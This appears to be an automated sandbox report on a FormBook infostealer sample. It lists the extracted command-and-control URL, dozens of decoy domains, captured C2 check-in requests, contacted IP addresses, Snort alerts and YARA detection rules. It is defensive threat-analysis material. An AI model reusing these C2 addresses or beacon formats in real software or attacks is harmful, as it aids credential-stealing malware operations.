Malware Configuration Extractor: FormBook {"C2 list": ["www.northpierangling.info/mh76/"], "decoy": ["healthgovcalottery.net", "wenxinliao.com", "rooterphd.com", "bbobbo.one", "american-mes-de-dezembro.xyz", "mintager.com", "thespecialtstore.com", "wemakegreenhomes.com", "occurandmental.xyz", "fidelityrealtytitle.com", "numerisat.asia", "wearestallions.com", "supxl.com", "rajacumi.com", "renaziv.online", "blixtindustries.com", "fjljq.com", "exploretrivenicamping.com", "authenticusspa.com", "uucloud.press", "conclaveraleighapts.com", "moqaq.com", "graphicressie.com", "homebest.online", "yisaco.com", "thedrybonesareawakening.com", "browardhomeappraisal.com", "xn--agroisleos-09a.com", "clinchrecovery.com", "rekoladev.com", "mlbl1.xyz", "tunecaring.com", "avconstant.com", "chelseavictorioustravels.com", "esrfy.xyz", "frijolitoswey.com", "zsfsidltd.com", "natashasadler.com", "kice1.xyz", "drivemytrains.xyz", "shopalthosa.xyz", "merendri.com", "yetkiliveznem7.xyz", "milestonesconstruction.com", "apparodeoexpos.com", "momotou.xyz", "chatkhoneh.com", "cacconsults.com", "kigif-indonesia.com", "segurambiental.com", "verynicegirls.com", "curearrow.com", "fdupcoffee.com", "theclevergolfers.com", "moushimonster.com", "qdchuangyedaikuan.com", "hopefortodayrecovery.com", "wk6agoboyxg6.xyz", "giybetfm.com", "completedn.xyz", "eluawastudio.com", "legacysportsusatexas.com", "comgmaik.com", "intelsearchtech.com"]}

Source: CSA73881.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: CSA73881.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: InstallUtil.exe, 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.313743282.0000000001108000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.470353191.0000000004975000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.774017184.0000000004DCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.474545794.0000000004B15000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.771221161.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: InstallUtil.exe, InstallUtil.exe, 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.313743282.0000000001108000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.470353191.0000000004975000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.774017184.0000000004DCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.474545794.0000000004B15000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.771221161.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: control.exe, 0000001C.00000002.767573609.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001C.00000002.776199164.00000000051DF000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb source: control.exe, 0000001C.00000002.767573609.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001C.00000002.776199164.00000000051DF000.00000004.10000000.00040000.00000000.sdmp

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.segurambiental.com
Source: C:\Windows\explorer.exe	Domain query: www.browardhomeappraisal.com
Source: C:\Windows\explorer.exe	Network Connect: 103.224.182.210 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.esrfy.xyz
Source: C:\Windows\explorer.exe	Domain query: www.comgmaik.com
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.merendri.com
Source: C:\Windows\explorer.exe	Network Connect: 75.2.26.18 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49841 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49841 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49841 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49846 -> 103.224.182.210:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49846 -> 103.224.182.210:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49846 -> 103.224.182.210:80

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe

DNS query: www.esrfy.xyz

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.CSA73881.exe.ee70000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.327687009.000000000EE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.northpierangling.info/mh76/

Source: Joe Sandbox View	ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US

Source: global traffic	HTTP traffic detected: GET /mh76/?Axo=j8MnV1AauDvQLYEDQHkxR7wEsLuzS8wOqoRJGUEtb1NYKXHLD1QrWCJCw/4m9jwcj9zX&e0Dd=gPHX06 HTTP/1.1Host: www.segurambiental.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mh76/?Axo=ZKvJ8T01Uu5swSUTolvzZP3eEu33eLq9PUpXuYL3kSIE+YGu43QnDiKj3vyinvzv5HiX&e0Dd=gPHX06 HTTP/1.1Host: www.browardhomeappraisal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLzHZ4&e0Dd=gPHX06 HTTP/1.1Host: www.comgmaik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 103.224.182.210 103.224.182.210

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 08 Aug 2022 12:28:06 GMTContent-Type: text/htmlContent-Length: 291ETag: "62f0fdc3-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: awselb/2.0Date: Mon, 08 Aug 2022 12:28:27 GMTContent-Type: text/htmlContent-Length: 118Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>

Source: CSA73881.exe, 00000000.00000002.314006871.00000000032B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com
Source: CSA73881.exe, 00000000.00000000.240713040.0000000000DE2000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://google.com)Exvkpxtvtblcdcgising7Uvadca.Properties.Resources
Source: CSA73881.exe, 00000000.00000002.315860973.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, CSA73881.exe, 00000000.00000002.314521039.00000000032FA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: control.exe, 0000001C.00000002.776382935.00000000056CF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://ww38.comgmaik.com/mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLz
Source: CSA73881.exe, 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, CSA73881.exe, 00000000.00000002.327687009.000000000EE70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: CSA73881.exe, 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, CSA73881.exe, 00000000.00000002.327687009.000000000EE70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Source: unknown

DNS traffic detected: queries for: www.merendri.com

Source: global traffic	HTTP traffic detected: GET /mh76/?Axo=j8MnV1AauDvQLYEDQHkxR7wEsLuzS8wOqoRJGUEtb1NYKXHLD1QrWCJCw/4m9jwcj9zX&e0Dd=gPHX06 HTTP/1.1Host: www.segurambiental.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mh76/?Axo=ZKvJ8T01Uu5swSUTolvzZP3eEu33eLq9PUpXuYL3kSIE+YGu43QnDiKj3vyinvzv5HiX&e0Dd=gPHX06 HTTP/1.1Host: www.browardhomeappraisal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mh76/?Axo=0EXE3m3wBb2Nxgj7DVqNl/WDAC0gNsnNDZKaZxMvJErakGZtakhmesbqHtechaZLzHZ4&e0Dd=gPHX06 HTTP/1.1Host: www.comgmaik.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.315621485.00000000033A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: CSA73881.exe PID: 5724, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: InstallUtil.exe PID: 5408, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: control.exe PID: 3004, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

.NET source code contains very large array initializations

Source: CSA73881.exe, tdt.cs

Large array initialization: sis: array initializer size 2178560

Source: CSA73881.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 14.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000000.411747127.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.765436230.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000000.390629415.000000000D77B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000000.309497191.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.769483906.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.315621485.00000000033A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.318276189.000000000435E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
